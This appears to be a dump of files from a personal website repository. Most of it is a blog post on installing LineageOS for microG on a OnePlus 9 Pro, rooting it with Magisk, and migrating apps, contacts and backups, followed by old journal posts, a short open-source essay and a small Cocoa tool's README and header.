send to phone:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ adb push extracted_20220430_213414/boot.img /sdcard/Download/
extracted_20220430_213414/boot.img: 1 file pushed, 0 skipped. 192.7 MB/s (201326592 bytes in 0.996s)
```
run the patch in the phone Magisk UI (under “install”)
get the patched file back:
```
im@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ patched=`adb shell ls /sdcard/Download/magisk_patched*`
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ adb pull $patched
/sdcard/Download/magisk_patched-24300_v4xhs.img: 1 file pulled, 0 skipped. 34.7 MB/s (201326592 bytes in 5.532s)
```
turn on advanced reboot again in settings
reboot to fastboot
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ fastboot flash boot magisk_patched-24300_v4xhs.img
Sending 'boot_a' (196608 KB) OKAY [ 6.597s]
Writing 'boot_a' OKAY [ 0.611s]
Finished. Total time: 7.387s
```
"reboot now"
success. open up magisk, shows as installed (v24.3)
## F-Droid app list
### Turn On Install history
Before starting installations do this so that we (might) have an exportable record to share.
Turn on install history before starting so that we can export at the end - <https://gitlab.com/fdroid/fdroidclient/-/issues/70#note_89110104>
Settings > Expert mode > Keep install history
### Export list when done
Settings > Install history and metrics > Share (share icon with 3 linked dots at top) > fail, no apps that know what to do with the file installed yet. gah.
### Google contacts, calendar & gmail - fail
via aurora
Install contacts...
- Sign in
- Goes to microG
- Then to official google sign in
- Sign in succeeds
- Acc now listed in settings > accounts
- google contacts still shows no accounts & no contacts. Damn
- tap acc, tap any of the settings (all go to same place) turn on "Allow apps to find contacts"
- now google contacts shows the account, but still doesn't sync.
Hrmm. Need this or equivalent obviously. Switching will be non trivial.
Same problem for gmail.
Calendar app works and has all events, desktop widget broken (shows no events)
#### Research
##### Alternatives
* <https://alternativeto.net/software/google-contacts/>
* <https://www.reddit.com/r/LineageOS/comments/7wnwpe/alternative_to_google_calender_or_contacts_sync/>
* <https://www.reddit.com/r/LineageOS/comments/8qv3p3/alternative_services_to_google_calendar_and/>
* <https://www.reddit.com/r/LineageOS/comments/pt5ce7/are_the_contacts_and_telephone_apps_built_by/>
* <https://f-droid.org/en/packages/com.simplemobiletools.contacts.pro/>
* <https://f-droid.org/en/packages/com.simplemobiletools.contacts.pro/>
##### Making it work
* <https://github.com/microg/GmsCore/issues/585>
* <https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG>
* [download Magisk-ConCal-Sync-MicroG repo zip](https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG/archive/refs/heads/master.zip)
* extract, go into inner folder and zip up the four items
* copy to phone with syncthing
* magisk > modules > install from storage > select the zip > done
* reboot phone
* boot loop. FUUUUUUUUCK
* reported issue for what it's worth, including `logcat` logs: <https://github.com/tomwiggers/Magisk-ConCal-Sync-MicroG/issues/3>
* remove modules
* <https://www.thecustomdroid.com/uninstall-magisk-modules-in-twrp-recovery-guide/>
* connect phone usb
* run `adb wait-for-device shell magisk --remove-modules` on laptop
* boot up phone normally
* phone booted into lock screen, phew!
#### Calendar
bearable, widget broken but app itself works and syncs
have to manually turn on sync for additional calendars
#### Contacts
Need alternative, perhaps fastmail
* Let's try fastmail's contacts...
* [google contacts web app](https://contacts.google.com/) > export from google contacts > vCard
* [fastmail web app > dropdown thing > settings](https://www.fastmail.com/settings/setup/importexport) > import > contacts > upload addressbook file > choose the vcf
* imported all but two, showed me the errors, not ones I care about.
* check fastmail phone app, contacts come flooding in.
* but no sign of them in the main phone contacts app. damn.
* <https://www.reddit.com/r/fastmail/comments/f2akqj/dealing_with_contacts/>
I've messaged fastmail support to ask them why they have a completely separate contact section in the fastmail app rather than using the shared contacts store in Android/LineageOS.
Because I'm short of good options I will reluctantly try the DAVx app that everyone points to. I really don't want yet another sync involved in the whole thing but I also don't want to run and maintain a NextCloud install (which lots of people suggest).
* Installing DAVx5
* It's listed in Aurora (the play store proxy) and shows "£4.29" instead of the usual "Install".
* Pressed money button to see what happens > error "Download failed, app not purchased". Cool.
* Go to [DAVx5 on play store](https://play.google.com/store/apps/details?id=at.bitfire.davdroid) and make the purchase
* concerningly for the future the play store pops an "install to blah device", which is fine now because it knows about my *old* phone, but what if I didn't have the old phone some time, does that mean I could no longer get paid apps and install them with Aurora?
* Back on the new phone Aurora install now works. Win.
* Setting up DAVx5
* rattled through default wizard without changing (or understanding) anything
* interesting warning about oneplus blocking sync that points to <https://www.davx5.com/faq/synchronization-is-not-run-as-expected>
* Create app password in fastmail web interface for DAVx
* Login to DAVx app with email + app-password ... fail, presumably because it's a custom domain
* Use custom base url option - <https://www.davx5.com/tested-with/fastmail>
* Base url: `https://carddav.fastmail.com` + email + app-password .... success
* Create account: account name? (defaults to <EMAIL>) - "Use your email address as account name because Android will use the account name as ORGANIZER field for events you create. You can't have two accounts with the same name." - probably fine, left default
* Contact group method:
* "Groups are separate vCards" - default, left as this
* "Groups are per-contact categories"
* Next
* No contacts sync (missing permissions) > Permissions > All of the below to "on" > grant dialogs
* Shows two unchecked checkboxes, but don't know what they mean
* "Global Address Book"
* "personal"
* Trying out ticking "personal", tick it and press orange sync now button
* woo, main contacts app now full of contacts. sim switch time!!!
#### GMail
todo, probably set up imap and use k9mail + web interface on laptop
### F-Droid app list
* Vespucci (open-streetmap (OSM) editor)
* andOTP (one time password generator with backup/restore capability)
* Aurora play store proxy - configure as per above section
* Syncthing
* OAndBackupX - to replace proprietary (but very good) titanium backup
* Needs root, provided by Magisk. Without root no apps can access the data of other apps. This is the primary reason that root is so important to me. I want a backup system that I can actually trust because it's not some proprietary cloud magic pixie dust, it's instead a straight-forward grab-the-files-and-put-them-somewhere-safe operation that I can inspect and get to without more proprietary black magic.
* [KeepassDX](https://www.keepassdx.com/) - <https://github.com/Kunzisoft/KeePassDX>
* k9mail
* vlc
* markor
* antennapod - todo restore state
* qr & barcode scanner
* aTimeLogger
* [Editor](https://f-droid.org/en/packages/org.billthefarmer.editor/) (replacement for droidedit?)
* [GPSLogger](https://f-droid.org/en/packages/com.mendhak.gpslogger/)
### todo - more apps (f-droid where possible)
* VLC
* AntennaPod
* Audible
* Maverick (for recording and viewing gps traces, could do with a replacement, the map tiles seem to have died and it's getting buggy)
* google home (for chromecast & google mini integration)
* RainAlarm (paid for ad-free)
* Google calendar (or find a non-google replacement)
* Google contacts (or find a non-google replacement)
* Waze
* Google maps (for satnav, route planning and finding local businesses)
* LinkedIn
* Twitter
* Telegram FOSS (a slightly free-er version of telegram)
* ...
### Other f-droid app suggestions
* <https://www.reddit.com/r/fdroid/comments/lzzdbg/a_list_of_some_fdroid_apps_i_installed_to_get_you/>
## Play store app list (via Aurora)
Only things not available in f-droid
* maps.me
* Spotify
* Audible
* Firefox
* google maps - works flawlessly!
* signal messemger
* surprisingly not in f-droid!
* can't be on multiple phones at once, can only "transfer". Grumble.
* banking apps (2/3 work)
* sunsama
* trello
* slack
* rain alarm - todo restore paid version
* zoom
* bulb energy
* YNAB
* Ring (doorbell)
* Google home
* Life360 (shared gps locations for family, saves a bunch of "have you left yet?" text messages)
* Fastmail - not for the mail, prefer k9mail, but to see if it can do contacts as well as goooooooogle
* DroidEdit
* Ringo
* National rail
* Goodreads
* Pluralsight
* LinkedIn
* FreeAgent
* BBC
* Weather
* Sounds
* iPlayer
* Amazon Shopping
* Amazon Prime
* YouTube
* Microsoft authenticator
* Google authenticator
* Bandcamp
* [Offline English Dictionary by Livio](https://play.google.com/store/apps/details?id=livio.pack.lang.en_US)
* Strava
## Built-in apps
### Camera - configure
* Hamburger
* GPS > on
* Touch focus duration > infinite (man that has always annoyed me! Default 3 seconds, why?!)
* shutter sound > disabled
### Browser - disable
Disable (using firefox instead)
### Messaging - disable
Messaging > long press > app info > disable
## Individual app setup
### Syncthing
* Open web gui
* Disable all non-LAN
* Remove default folder (Camera)
* Set device name
* Connect to existing machine(s).
* Add `/storage/emulated/0` folder (can't do this in non-web gui, stupid security warning. Nanny state of android.)
* Warnings about failure to sync `Android/data` and `Android/obb`. Looks like they've tightened up security more, either that or syncthing has better warnings now. These folders will be exposed by OAndBackupX so I can safely ignore this until I sort out the ignore file for syncthing.
Oh no, syncthing can no longer access `/storage/emulated/0/Android/data` - <https://forum.syncthing.net/t/can-i-sync-send-only-data-from-android-data-in-android-11/17898>
Even more reason to have root and run a real and independent backup tool.
#### Syncthing ignore patterns
Set up ignores for caches and things that won't sync. Files for this are on github at <https://github.com/timabell/dotmatrix/tree/master/phone>
* Create file `phone.stignore` in the root of the sync'd sdcard folder. This one you can edit on the laptop as you find more things you don't want sync'd.
* Create file `phonetemplate.stignore` in the root folder and put only this line in it `#include phone.stignore`
* On the phone when they have sync'd copy the `phonetemplate.stignore` to a file named just `.stignore` in the root folder.
The reason for this dance is that syncthing won't sync the `.stignore` so to be able to edit the ignores on a different device you have to set up a link.
### AndOTP
* Set up password
* Turn off global timeout bar (distracting & stressful)
* Icons: small
* Layout: compact
* Copy backup from old phone with syncthing and restore it
### AntennaPod
Now I get to the crux of why I was so fucked off with Android.
I want to copy the *exact* state of antennapod to the new phone; but my old phone de-rooted itself and broke the backups; and you can't back up ~/data where everything lives without root because it's all locked down with per-app-user permissions, which is great for isolating apps from each other ... and you. The only option for those folders is in app sync (e.g.. sign in to trello/firefox/slack etc) so local state is throwaway, or backup to google drive .... to some magical fucking invisible folder so you can't even download the backups it made. This shit makes me so mad.
We already have working systems for backups and security and these fuckers have broken them and replaced them with their own vendor-locked-in proprietary black-box shite that doesn't even work all the time.
Because I'd lost root and usable backups it took me a while to work out how to transfer my latest beloved podcast player state to a new phone. I knew that you could import/export an OPML list of suscriptions but I really wanted to keep the play state of every episode so I caould easily scan the back-catalogues for episodes I'd never listened to dotted amongst the many thousands of episodes I have listned to. Well darm it there is a full export feature I didn't know about. It exports to the virtual sdcard storagea which is kinda like a home directory that you can actually access as a user. I already have the sdcard storage syncing to my other machines with syncthing so getting it from there onwards is a trivial copy-paste on the laptop.
Here's what a quick ~~google~~ [ddg](https://duckduckgo.com/) showed up:
* <https://github.com/AntennaPod/AntennaPod/issues/5391>
* <https://github.com/AntennaPod/AntennaPod/issues/5031>
* <https://github.com/AntennaPod/AntennaPod/issues/377>
Old phone:
* hamburger menu top left
* settings (cog at bottom) > storage > import/export > database export
* ensure syncthing is running and connected
Laptop:
* Copy file on laptop to new phone's sync folder
New phone:
* make sure symcthing is running, connected and up to date to pull new file in
* hamburger menu top left
* settings (cog at bottom) > storage > import/export > database import > Confirm
* select file
* press ok to restart Antennapod
* Woo! Queue entirely intact!
Downloads have to be re-done for the queue but the UI makes that dead easy, just hit play and it switches to a download button so you can whip through them quick.
### Bulb energy
* App downloaded
* Sign in by magic email link failed
* Sign in with password worked
* Statement download failed with "no apps can perform this action" but can always use website to get them. ... ah, no pdf reading apps installed, installing a random pdf app fixed that. Not a very clear error message that one!
### KeePassDX
Enable fingerprint unlock <https://github.com/Kunzisoft/KeePassDX/wiki/Advanced-Unlocking#b-link-database-credential-to-advanced-unlock-recognition=>
### NeoBackup
* Backup folder > neo-backup folder on emulated sdcard home > use this folder
* Allow access prompt > allow
"i" button top right > interesting note about types of android data and inability to restore apps using hardware key stores such as signal
* work out what apps to back up -- all of them, why guess what I'll need with so much storage available
* actual backups - done
* schedule backups - done, works great
* maybe automate clearing off phone onto laptop/server
* Set backup password
Set scheduled backup:
* 7 days
* 5am
* system apps + user apps
* apk + obb + data + device protected data
* all apps
* enabled
* Start now
### Firefox
3dots > settings > Search > duckduckgo
firefox was active for 6 hours which makes me think it isn't backgrounding properly, perhaps because of media or js on websites.
Firefox icon > long press > App info (i) > Advanced > Battery > Background restriction > Restrict
### Signal
Use transfer account to new phone feature
Enable chat backups to virtual SD: dots > settings > chat. > Chat backups. Set folder and create backup.
Signal popup saying detected issue with play services and establishing own connection. Now have permanent notification.
### GPSLogger
<https://f-droid.org/en/packages/com.mendhak.gpslogger/>
* hamburger
* logging details
* save to folder > give permissions > new folder (+) > `~/gpx`
* New file creation > every time I start
* performance
* Logging interval > 5 secs
So that syncthing can see it. Defaults to inaccessible data folder. Fffffff
Also set to create new track every time.
## A thought on moving apps and data between phones
During the 1000th discussion of phones with my long-sufferring better-half I happened to utter a line that I think realy captures why this whole nonsense is (probably) worth the effort:
> "Living in the iOS ecosystem with their magical one-tap transfer from old phones to new phones that leave the new phone exactly in the same state as your old phone ... until you realize one day you want to leave the ecosystem, and you have to leave all your data behind in their walled garden." ~ Me
There are several ways of moving data between phones, which provide varying levels of protection against data loss disasters. Disasters that could be local (phone down loo), localized (all devices stolen from house), cloud based (cloud account hacked and wiped), a combination (cloud hacked and devices remote-wiped).
### Copying files directly
Something like syncthing.
Only works for data on virtual sdcard such as photos & downloads.
### Local backup/restore
With OAndBackup, NeoBackup, TitaniumBackup etc.
Needs root.
Can get app's private data out to storage you control.
Can also backup set of installed apps (`.apk`s) which it turns out is actually quite a time saver compared to clicking install in the app store 100+ times.
### Vendor-provided cloud backup
Completely walled-garden solution. No way to get your data off their cloud without restoring to another device they support (i.e. another Android/iOS device).
### 3rd party cloud backup
Something like dropbox.
It seems that the duopoly has deemed this unacceptable so have hobbled these apps fom working properly or at all. Dropbox on iOS has been reduced to a glorified photo backup which can't even run in the background.
Personally I think the fact that the duopoly is denying competition is anti-competitive practice the likes of which saw Microsoft get record fines from the EU back in the day. Hopefully the same will happen to Apple & Google to crack this open a bit, but until then we'll have to just shovel digital shit like this blog post to get out from under them.
## File transfer
Easy thanks to syncthing, just move the folders & files on the laptop from sync sdcard folder of the old phone to the one for the new phone. Win.
## Trial TitaniumBackup restore - success
Before my old phone de-rooted itself thanks to a F****g OS update (grrrrr) I did have titanium set up, so I have somem rather stale backups from before then. Mostly as an experiment I've installed Titanium on the new phone to see if the restore works. This is the first time I've had two capable and still working phones at the same time to be able to experiment like this.
* Installed TitaniumBackup via Aurora.
* Installed Titanium's "key" app via Aurora.
* Titanium complained that Play store wasn't responding so couldn't check licence key. Fucksake. More lockin.
* Removed key app again.
* Copied one of the old backups across (google authenticator). (An app I had not yet installed on the new phone)
* Fired up titanium, hit restore for that app.
* Boom! There's the app installed, fired it up, worked no problems and now have an (outdated) list of OTPs that I don't use any more. Hollow victory achieved.
## Clock
* Settings
* Time in seconds > on
* Alarms
* silence after > 5 mins
* Snooze length > 15 minutes - I find that if I'm really too tired to move 15 mins makes a good power nap but isn't long enough to be disastrous
* gradually increase
* vol button to snooze
## Config
A complete list
Settings:
* Network and Internet
* Hotspot and Tethering
* Wi-Fi Hotspot
* On
* AP Band
* 5 GHz band preferred
* Bluetooth tethering > On (to give the laptop internet out and about)
* Connected Devices
* Connection preferences
* Bluetooth
* Device name: foo
* Wifi
* Wifi preferences
* Notify for public networks > off
* Apps and Notifications
* Default apps
* SMS app > Signal (actually a great integrated SMS app)
* Notifications
* Advanced
* Do Not Disturb
* People
* Calls > "Contacts and repeat callers"
* Battery
* Battery saver and performance
* Automatic power saver - 15% (off by default oddly)
* Display
* Dark theme
* on
* no schedule - (let's give this a try, we'll see what it's like in broad daylight)
* pure black - on (better for battery and I think it looks cooler)
* Night Light
* Schedule
* sunset till sunrise - this is an experiment, we'll see if it is sensible at it
* Advanced (because this is extreem l33t haxxor stuff, beware n00bs)
* Screen timeout - 5 mins (scary stuff I know, you were warned by the **advanced** thing, I hope you know what you're doing. The nanny phone-state will keep you safe, don't you worry your pretty little head about this section. Twunts.)
* Styles and wallpapers - yes you read that right folks, wallpapers are an "Advanced" feature. What is wrong with this people?
* push a couple of images across to ~/Pictures with syncthing and set them as home & lock screen
* Lock screen
* Add text on lock screen
* `Owner <NAME> <<EMAIL>>` (the idea is that people are generally good and this might be the best way to reach me if I've lost it)
* Tap to sleep - off (I only ever do this by mistake)
* Font size > Largest (I'm gettingn quite long-sighted)
* Sound
* Vibrate for calls - Always (also has a vibrate then ring which is a nice option)
* Advanced (why??????)
* Phone ringtone - thriller three (there's a great selection & variety available, impressed with Lineage here. Also liked Solarium, Sheep (yes actual sheep), Rigel)
* Default notification sound - Hojus (also liked Beryllium and Titan for minimal stress-inducing feel. Again a great selection available with some really fun sounds).
* Default alarm sound - Piezo Alarm (for the retro kicks. Again more winners in here, well worth exploring)
* Dial pad tones - off
* Screen locking sound - off
* Touch sounds - off
* Privacy
* Show passwords, display characters briefly as you type - off (I just find this annoying/distracting)
* Notifications on lock screen
* Don't show notifications at all - this is more for a clear mind rather than privacy, though that's a bonus. I hate looking at my (locked) phone for the time and getting drawn into the notifications. Happened toooooo many times.
* Trust
* SMS message limit - always confirm (default of 30 seems like a lot of spam to me), might go to 5 if this is a pain
* Security
* Screen lock - pin
* Fingerprint
* System
* Buttons
* Additional buttons
* Slider top - total silence
* Status bar
* Network traffic monitor
* Display mode > upload and download
* Battery status style - Circle (much higher fidelity information)
* Advanced
* Gestures
* Power menu
* Advanced restart - on
* Developer options
* Automatic system updates > off ("Apply updates when device restarts)
* About phone
* Emergency information (wtf is this in about phone for? I had to ddg to find it)
* Add information
* set all the things
* Add contact
* doesn't work, just shows empty list to choose from. dang. TODO
### Legacy phone connectivity
The old phone has Wifi at home but without a sim has no internet out and about. Tether to new phone to give it access to internet elsewhere as needed.
Connected to WiFi hotspot but although it accepted the details it fails to actually connect.
Pair to other phone with bluetooth (either end is fine). On old phone open bluetooth settings, go to device > configure (cog) > Internet access > On.
Success, old phone has internet via bluetooth to new phone just like laptop. Win.
## Todo
* firmware update: <https://wiki.lineageos.org/devices/lemonadep/fw_update>
* Backup/restore with titanium
* better camera support? <https://www.xda-developers.com/google-camera-port-hub/>
* see if android pay etc will work with magisk magic mask pretending we haven't unlocked anything
* find an alternative to titanium backup <https://forum.xda-developers.com/t/farewell-to-titanium-backup-looking-for-alternative.3932814/>
* contribute to lineage to link to golang extractor, maybe with step by step instructions
* Make signal default sms app
* Camera from lock screen
* transfer paid version of rain alarm, seems to be missing three-dot-menu on new version
* Xmeye cctv
* Backup alarms
* Signal SMS warnings -> Settings-privacy-Trust-SMS Sending Limit > 5
* No access to work google cal
* Ignore public wifi
* Maps.me voice. Needs language pack. Wut.
* Remember Bluetooth tethering setting. Needs code change.
* Phone default to Bluetooth
## Problems & bugs
* Phone app
* Fails to unblank when phone rings half the time. Workaround to use power button to sleep/wake a couple of times to wake it up. Painful but bearable.
* Rainalarm problems:
* no menu so can't enable paid copy
* map loads but no rain shown
## OS Updates
<https://wiki.lineageos.org/devices/lemonadep/update>
Watch out for de-rooting, make sure backups are up to date first.
Got the first Over The Air (OTA) (...well, over wifi anyway) update from LineageOS. Download. Install. Reboot. Magisk no longer installed. Well that's a fucking pain. NeoBackup fails to start. Backups now broken. Fuck you android.
todo: see if I can restore root with out a full wipe and reinstall this time. twunts. what a pile of yaks.
* [OnePlus Community forum: Keep Root with Magisk with OTA updates](https://community.oneplus.com/thread?id=914099)
* [piles of fucking yaks courtesy of reddit](https://www.reddit.com/r/LineageOS/comments/hynl52/any_way_to_keep_magisk_and_installed_modules_when/)
* <https://android.stackexchange.com/questions/200410/how-do-i-update-an-ota-while-retaining-twrp-and-magisk-only-with-my-phone>
* <https://topjohnwu.github.io/Magisk/ota.html> -
> "When an OTA is available, first go to (Magisk app → Uninstall → Restore Images). Do not reboot or you will have Magisk uninstalled."
Bit fucking late now.
So basically you have to know all this *before* you let android install an update and fuck up your setup (again). Pit of failure.
Guess I'll have to re-do the patch thing I did in the first place.
Export Antennapod state, backup andOTP and make sure syncthing has pushed the files before attempting anything.
### Re-root attempt - success!
Let's try repeating the magisk setup from the original install but with the updated image.
* Check current version installed
* on phone: settings > about > android version > > lineageos version: lineage-18.1-20220518-microG-lemonadep
* Download matching image to laptop from <https://download.lineage.microg.org/lemonadep/> (if it's still available, which it is. If it wasn't then might have to run more updates or grab image from phone somehow)
* Run the payload extaction, patch on phone & reflash as in original install:
* ` ../../payload-dumper-go/payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go ../lineage-18.1-20220518-microG-lemonadep.zip`
* [plug phone in to laptop with usb]
* `adb push extracted_20220704_232617/boot.img /sdcard/Download/`
* patch the file in magisk on the phone (install > patch > select file etc.)
* get the patched file back on to laptop: `patched=``adb shell ls /sdcard/Download/magisk_patched*`` && echo $patched && adb pull $patched`
* advanced reboot on phone > fastboot
* flash the boot image:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload2
$ fastboot flash boot magisk_patched-24300_nspcI.img
target reported max download size of 268435456 bytes
sending 'boot_b' (196608 KB)...
OKAY [ 5.675s]
writing 'boot_b'...
OKAY [ 0.644s]
finished. total time: 6.320s
```
* reboot phone ("reboot system now" > power button)
* open up magisk app .... drumroll ....
* success!! "Installed 24.3 (24300)"
... run a backup with neobackup to see if it works... oh never mind it just popped a notification that neobackup has been granted superuser so I guess it can run its backups now and the schedule has kicked it off after a reboot.
### OTA (Over The Air) update without losing root - fail
Having regained root by patching and flashing boot.img again (above) I'm going to try the OTA on-phone patching as per <https://topjohnwu.github.io/Magisk/ota.html>:
* Settings > System > Advanced > Updater
Press refresh symbol in top right corner.
Two images available:
1. LineageOS 19.1, 11 June 2022, 1.3GB > INFO > "Update blocked This update cannot be installed using the updater app. Please read <https://wiki.lineageos.org/devices/lemonadep/upgrade> for more information."
2. LineageOS 18.1, 18 May 2022, 1.1GB > INSTALL > ...
So let's try the point update following [the magisk ota instructions](https://topjohnwu.github.io/Magisk/ota.html)
* Magisk app > Unistall.... um, where's that then. Perhaps missing because it wasn't instaled this way.
* "This will restore partitions modified by Magisk back to stock from backups made at install in order to pass pre-OTA block verifications." - yeah that figures, I didn't do that so there's no backups to restore.
* Guess we'll skip this and hope for the best
* Settings > System > Advanced > Updater > 18.1 18 May 2022 > INSTALL > OK
* ... ~ 10 mins elapse ...
* Updater shows "reboot" button. *DON'T PRESS IT!!*.
* Magisk app > install > install to inactive slot (after OTA) >
* "Attention. Your device will be FORCED to boot to the current inactive slot after a reboot! Only use this option after the OTA is done. Continue?" > OK
* Target slot _a ...
* failed! dammit.
* press little save button top right to save log
Failure log: `magisk_install_log_2022-07-05T21_12_57.log`
```
- Target slot: _a
- Target image: /dev/block/sde16
- Device platform: arm64-v8a
- Installing: 24.3 (24300)
- Unpacking boot image
Parsing boot image: [/dev/block/sde16]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10201092]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
KERNEL_FMT [raw]
RAMDISK_FMT [gzip]
VBMETA
- Checking ramdisk status
Loading cpio: [ramdisk.cpio]
- Stock boot image detected
- Patching ramdisk
Loading cpio: [ramdisk.cpio]
Add entry [init] (0750)
Create directory [overlay.d] (0750)
Create directory [overlay.d/sbin] (0750)
Add entry [overlay.d/sbin/magisk32.xz] (0644)
Add entry [overlay.d/sbin/magisk64.xz] (0644)
Patch with flag KEEPVERITY=[true] KEEPFORCEENCRYPT=[true]
Loading cpio: [ramdisk.cpio.orig]
Backup mismatch entry: [init] -> [.backup/init]
Record new entry: [overlay.d] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin/magisk32.xz] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin/magisk64.xz] -> [.backup/.rmlist]
Create directory [.backup] (0000)
Add entry [.backup/.magisk] (0000)
Dump cpio: [ramdisk.cpio]
- Repacking boot image
Parsing boot image: [/dev/block/sde16]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10201092]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
KERNEL_FMT [raw]
RAMDISK_FMT [gzip]
VBMETA
Repack to boot image: [new-boot.img]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10715780]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
- Flashing new boot image
- Sepolicy rules dir is /dev/hWU/.magisk/mirror/metadata
! Installation failed
! Unable to download bootctl
```
Guess I'll try the patch of boot again.
## Conclusion: inconclusive
The main thing I've learned from this is the long-standing duopoly of iOS+Android has caused deep and hard to reverse problems in the phone software ecosystem. It's a crying shame really because there is so much opportunity for innovation now that phone hardware is basically done, but instead we get stagnation, pointless features, anti-features and down-right user-hostile behaviour from both we-know-best camps. It really reminds me of the dark years of the browser and operating system wars. Particularly when internet explorer became dominant and website (i.e. app) developers targeted proprietary IE APIs, locking everyone in and nearly killing the competition. The same for windows in its prime (when Balmer shouted developers-developers-developers he knew the apps created platform-vendor lock-in that he so desired).
There are some promising signs: Ubuntu so nearly made a phone, and then didn't hit their funding target (the ubuntu phone operating system lives on in obscurity), The Librem looks like it might be a sustainable Linux based phone & business (Android is *not* Linux remember).
For me I think I'll do the closest thing I can to dual-boot and VMs which is to have a second burner phone to run prioprietary crap, but have a primary phone that's as open as I can make it, just like I did with Linux and Windows around 2005-2010.
Every person that takes this route is a vote for change. User numbers matter, especially when it comes to app vendors; they won't invest in dead platforms, but they can't and don't ignore growing market share, and if that's free and open it gets supported. Just look at Microsoft rewriting their *entire* dotnet ecosystem from scratch to be cross platform.
Open source moves slowly, but like an iceberg it's hard to stop when it's claimed the land.
## End... for now
That's as far as I've got so far. I'll be editing this post as I progress with the install so do come and look again. Also suggestions and questions welcome.
I really do hope one day I can de-google my phone just like I de-microsofted my laptop, but today is not that day for me.
## Further reading
* <https://www.howtogeek.com/358166/using-android-without-google-a-kind-of-guide/>
<file_sep>---
title: "message to motorola support"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52397/message-to-motorola-support
---
<p>to: <EMAIL><br>subject: support request</p>
<p>Dear Sirs,</p>
<p>I spoke to one of your people on the phone and she recommended I mail details of the three issues I'm having with my new Motorola bluetooth headset.</p>
<p>I own a Sony Ericsson P800<br>(Firmware details: Phone: CXC162002 R2D, Bluetooth: CXC12529 R5A)</p>
<p>I have purchased (yesterday) a Motorola HS810 Bluetooth headset to use with it. (From car phone wharehouse)<br>It paired up correctly and I have successfully made & received calls using it.</p>
<p>I am now having difficulty with voice dialling features. When I press the multifunction button on the side of the headset (which does work for answering calls and hanging up) in order to begin a call using voice dialling, the phone picks up the bluetooth connection, but does not then look up any voice commands as it should. I have tested this functionality without the headset and it works as follows: hold down jog dial, speak name, number is dialled.<br>Any ideas?</p>
<p>Probably a separate issue: I don't hear the recorded name that the phone plays when I receive an incoming call from a number which has a voice recording attached (the phone says "playing voice command" but the headset doesn't have sound at that point).</p>
<p>The other thing was: the manual says if you press both volume buttons then the LEDs will stop flashing. But they don't, which is odd.</p>
<p>I look forward to any help you can give me with these queries.</p>
<p>Yours</p>
<p><NAME><br>077** ******</p>
<file_sep>---
title: "tim's technical ramblings"
date: 2005-08-10
slashdot_url: https://slashdot.org/journal/114172/tims-technical-ramblings
---
<p>I'll probably post all technical comments to my space on code project now.</p>
<p><a href="http://www.codeproject.com/script/profile/whos_who.asp?id=1037965">http://www.codeproject.com/script/profile/whos_who.asp?id=1037965</a></p>
<file_sep>---
layout: post
title: Why publish open source when you are commercial?
date: '2014-03-08T19:07:00.000Z'
author: <NAME>
tags:
modified_time: '2014-03-08T19:07:01.451Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5055561057000769363
blogger_orig_url: https://timwise.blogspot.com/2014/03/why-publish-open-source-when-you-are.html
---
Why open source your commercial projects?
* Forces you to decouple them from other internal systems.
* Encourages thinking in terms of reusable modules, which is better for
internal reuse just as much as public reuse.
* Possibility of contributions to systems useful to your business by others.
* Easier reuse within your organisation (the public internet is a better
search and sharing system than any internal systems).
* Reputation advantages, the best coders often like to work in open and
forward-thinking companies, and having public shared code is a great sign
of such an organisation.
Do it early
* Preferably push your very first commit straight to github.
* Do it before it has a chance to be tightly coupled to internal systems,
otherwise you'll have to unpick it and it will be less decoupled from day
one, and inertia might mean that in spite of the best intentions you then
never publish it.
* You'll have it in mind that every commit is public from day one, avoiding
adding internal config etc and forcing you to factor it out into config
which is all round a good thing.
* Don't wait for your code to be perfect, there are compromises in all code
and sharing something imperfect is better than sharing nothing.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/12293521763/in/photostream/"><img
src="https://live.staticflickr.com/3756/12293521763_39d7704c73_k.jpg"
alt="People on the beach with a clifftop"></a>
</div>
Worried about the brand?
* Commit under personal email addresses and push to personal github accounts.
You can always setup a corporate github account later when you are feeling
more confident.
Of course I'm not saying you should open source everything, for example your
core product's codebase should probably not go on github if you are a product
company!
_Be brave, be open._
Props to [<NAME>](https://twitter.com/tomskitomski)
| 5decd41542204a5f73f1485042dfa58c40c491e3 | [
"Markdown",
"HTML",
"Shell"
] | 307 | Markdown | timabell/timwise.co.uk | 7c67b566c352ee11f0e4998a4eac6216c04bfca3 | d3cd55f5f8315c0939ad5f356ddb067a969ee827 |
refs/heads/master | <file_sep>EYEAtos
=======
GUI atos for re-symbolicating Cocoa method calls in crash log.
Developing in very early stage, and you need Xcode 5 to open the .xib file.
###How to use
1. Place __YourApp.app__ and __YourApp.app.dSYM__ in the same directory
2. Launch __EYEAtos__
3. Chose __YourApp.app__
4. Copy & Paste the crash log into __EYEAtos__
5. Press __⌘R__ to re-symbolicate
0. Press __⌘⇧E__ to chose another .app file<file_sep>//
// ATSNotificationDefinitions.h
// atos
//
// Created by eyeplum on 4/20/14.
// Copyright (c) 2014 eyeplum. All rights reserved.
//
#ifndef atos_ATSNotificationDefinitions____FILEEXTENSION___
#define atos_ATSNotificationDefinitions____FILEEXTENSION___
static NSString * const ATSArchiveDidBeSelectedNotification = @"com.eyeplum.atos.archiveSelect";
static NSString * const ATSArchiveFileWrapperKey = @"com.eyeplum.atos.archiveFileWrapper";
